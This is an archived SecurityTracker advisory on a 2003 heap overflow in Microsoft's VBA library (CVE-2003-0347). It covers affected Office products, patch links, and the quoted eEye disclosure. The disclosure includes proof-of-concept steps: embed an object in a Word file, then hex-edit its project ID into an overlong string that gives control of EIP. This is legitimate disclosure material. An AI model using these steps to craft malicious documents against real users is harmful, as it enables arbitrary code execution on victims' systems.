SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Microsoft Word Vendors:   Microsoft
(Microsoft Word is Vulnerable) Microsoft Visual Basic for Applications (VBA) in Multiple Microsoft Products Permits Remote Code Execution
SecurityTracker Alert ID:  1007639
SecurityTracker URL:  http://securitytracker.com/id/1007639
CVE Reference:   CVE-2003-0347   (Links to External Site)
Date:  Sep 4 2003
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 97, 98 (J), 2000, 2002
Description:   A vulnerability was reported in Microsoft Visual Basic for Applications (VBA), affecting a large number of Microsoft applications. A remote user can cause an affected application to execute arbitrary code.

eEye Digital Security reported that VBA does not properly check certain document properties passed to VBA by the host application. A remote user can create a document that, when opened by the target user, calls VBA with specially crafted parameters to trigger a buffer overflow and execute arbitrary code. The code will run with the privileges of the target user.

According to the report, a heap overflow resides in VBE.DLL and VBE6.DLL. The overflow can be triggered when a malicious Microsoft Office file (e.g., ".doc", ".xls") is opened. This can be exploited via Internet Explorer (IE), as IE relies on helper applications that use VBA, the report stated.

Some demonstration exploit steps are described in the Source Message.

The following products use the vulnerable VBA application and, as a result, are vulnerable:

* Microsoft Access 97
* Microsoft Access 2000
* Microsoft Access 2002
* Microsoft Excel 97
* Microsoft Excel 2000
* Microsoft Excel 2002
* Microsoft PowerPoint 97
* Microsoft PowerPoint 2000
* Microsoft PowerPoint 2002
* Microsoft Project 2000
* Microsoft Project 2002
* Microsoft Publisher 2002
* Microsoft Visio 2000
* Microsoft Visio 2002
* Microsoft Word 97
* Microsoft Word 98(J)
* Microsoft Word 2000
* Microsoft Word 2002
* Microsoft Works Suite 2001
* Microsoft Works Suite 2002
* Microsoft Works Suite 2003
* Microsoft Business Solutions Great Plains 7.5
* Microsoft Business Solutions Dynamics 6.0
* Microsoft Business Solutions Dynamics 7.0
* Microsoft Business Solutions eEnterprise 6.0
* Microsoft Business Solutions eEnterprise 7.0
* Microsoft Business Solutions Solomon 4.5
* Microsoft Business Solutions Solomon 5.0
* Microsoft Business Solutions Solomon 5.5

Impact:   A remote user can create a malicious document that, when opened on the target system, will execute arbitrary code with the privileges of the target user.
Solution:   The vendor has released the following patches. There are several versions available. Make sure that you apply the proper patch.

For Microsoft Office 2000:

http://microsoft.com/downloads/details.aspx?FamilyId=E2CCE199-9C4A-4EEC-A3EC-9F738017F275&displaylang=en


For Microsoft Office XP (including Publisher 2002):

http://microsoft.com/downloads/details.aspx?FamilyId=6F1FC4B0-29E9-44E0-A33D-AD6B4B6A8FF4&displaylang=en


For Microsoft Project 2000:

http://microsoft.com/downloads/details.aspx?FamilyId=E53A52E7-431D-4580-9733-B92A2B7BFD0D&displaylang=en


For Microsoft Project 2002:

http://microsoft.com/downloads/details.aspx?FamilyId=525BDE0A-0028-488A-8209-6E07D4603CCB&displaylang=en


For Microsoft Visio 2002:

http://microsoft.com/downloads/details.aspx?FamilyId=55944490-13C2-4043-BA2A-17AF02E9C73E&displaylang=en

For Microsoft VBA Patch:

http://microsoft.com/downloads/details.aspx?FamilyId=DA1A7ABA-CD3D-458B-9729-AB9094C9BD3F&displaylang=en


Microsoft recommends that users visit Office Update to install the patch:

http://www.office.microsoft.com/ProductUpdates/default.aspx


According to the report, the Microsoft Office 2000 patch can be install on Microsoft Office 2000 SP3. The Microsoft Office XP patch can reportedly be installed on Microsoft Office XP SP2, Microsoft Works 2002, and Microsoft Works 2003. The Microsoft Visio 2002 patch can be installed on Microsoft Visio 2002.

The Microsoft VBA patch can reportedly be installed on:

Microsoft VBA 5.0
Microsoft VBA 6.0
Microsoft VBA 6.2
Microsoft VBA 6.3
Microsoft Access 97
Microsoft Excel 97
Microsoft PowerPoint 97
Microsoft Word 97
Microsoft Word 98(J)
Microsoft Visio 2000
Microsoft Works Suite 2001
Microsoft Business Solutions Great Plains 7.5
Microsoft Business Solutions Dynamics 6.0
Microsoft Business Solutions Dynamics 7.0
Microsoft Business Solutions eEnterprise 6.0
Microsoft Business Solutions eEnterprise 7.0
Microsoft Business Solutions Solomon 4.5
Microsoft Business Solutions Solomon 5.0
Microsoft Business Solutions Solomon 5.5

A reboot is required after installation if 'vbe.dll' or 'vbe6.dll' is in use when the patch is installed.

Microsoft has issued Knowledge Base article 822715 regarding this flaw:

http://support.microsoft.com/default.aspx?scid=kb;en-us;822715

Vendor URL:  www.microsoft.com/technet/security/bulletin/MS03-037.asp (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Sep 3 2003 Microsoft Visual Basic for Applications (VBA) in Multiple Microsoft Products Permits Remote Code Execution



 Source Message Contents

Subject:  EEYE: VBE Document Property Buffer Overflow


VBE Document Property Buffer Overflow

Release Date:
September 3, 2003

Reported Date:
May 7, 2003

Severity:
High (Code Execution)

Systems Affected:
Microsoft Access 97, 2000, 2002
Microsoft Excel 97, 2000, 2002
Microsoft PowerPoint 97, 2000, 2002
Microsoft Project 2000, 2002
Microsoft Publisher 2002
Microsoft Visio 2000, 2002
Microsoft Word 97, 98(J), 2000, 2002
Microsoft Works Suite 2001, 2002, 2003
Microsoft Business Solutions Great Plains 7.5
Microsoft Business Solutions Dynamics 6.0, 7.0
Microsoft Business Solutions eEnterprise 6.0, 7.0
Microsoft Business Solutions Solomon 4.5, 5.0, 5.5

Description:

The Visual Basic Design Time Environment library (VBE.DLL and VBE6.DLL),
used by the Microsoft Office series and other Microsoft applications,
contains an exploitable heap overflow vulnerability. If a malicious Office
file such as ".doc", ".xls", etc. is opened, there is the ability for an
attacker to execute arbitrary code. This buffer overflow bug also affects
Internet Explorer, because some Office files are executed automatically by a
helper-application when these files are received.

Technical Description:

[Technical data may wrap in eMail. Please visit our website.]

The following steps can be performed in order to create a proof-of-concept
Word document:

1. Open Word.
2. Select "Insert" - "Object"
3. Select "MSPropertyTreeCtl Class" (You can also select other objects such
as ChoiceBox Class, etc)
4. Save .doc file.
5. Modify .doc file by using binary editor as follows:

5a. Find following strings in doc file.

ID="{1FE45957-2625-4B1E-ADEF-EC04B7F34CCF}"
Document=ThisDocument/&H00000000
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="1E1C0125015D1B611B611B611B61"
DPB="4B4954458046804680"
GC="787A679868986867"

5b. Change "ID" from:

 +0000  49 44 3D 22 7B 31 46 45 34 35 39 35 37 2D 32 36   ID="{1FE45957-26
 +0010  32 35 2D 34 42 31 45 2D 41 44 45 46 2D 45 43 30   25-4B1E-ADEF-EC0
 +0020  34 42 37 46 33 34 43 43 46 7D 22 0D 0A 44 6F 63   4B7F34CCF}"..Doc
 +0030  75 6D 65 6E 74 3D 54 68 69 73 44 6F 63 75 6D 65   ument=ThisDocume

to the following:

 +0000  49 44 3D 22 7B 61 61 61 61 61 61 61 61 61 61 61   ID="{aaaaaaaaaaa
 +0010  61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61   aaaaaaaaaaaaaaaa
 +0020  61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61   aaaaaaaaaaaaaaaa
 +0030  61 61 61 61 41 42 43 44 00 00 00 00               aaaaABCD....

6. Open modified doc file.
7. You'll be able to see an access violation such as...

65106055 FF 52 0C   call        dword ptr [edx+0Ch]

 EAX = 023219A4 EBX = 0232194B ECX = 02311AC4
 EDX = 44434241 ESI = 0231186C EDI = 02321940
 EIP = 65106055 ESP = 0012CBA0 EBP = 0012CBB8

We can set any value to EDX register, so, we can control EIP register.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
Microsoft was notified on May 7, 2003, and has released a patch for this
vulnerability. The patch is available at:
http://www.microsoft.com/technet/security/bulletin/MS03-037.asp

Credit:
Yuji "The Ninja" Ukai, eEye Digital Security

Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/Products/Retina/index.html

Greetings:
Shanti, Yukkie, TEX, Sakuranamiki people, AD200X people

Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
info@eEye.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC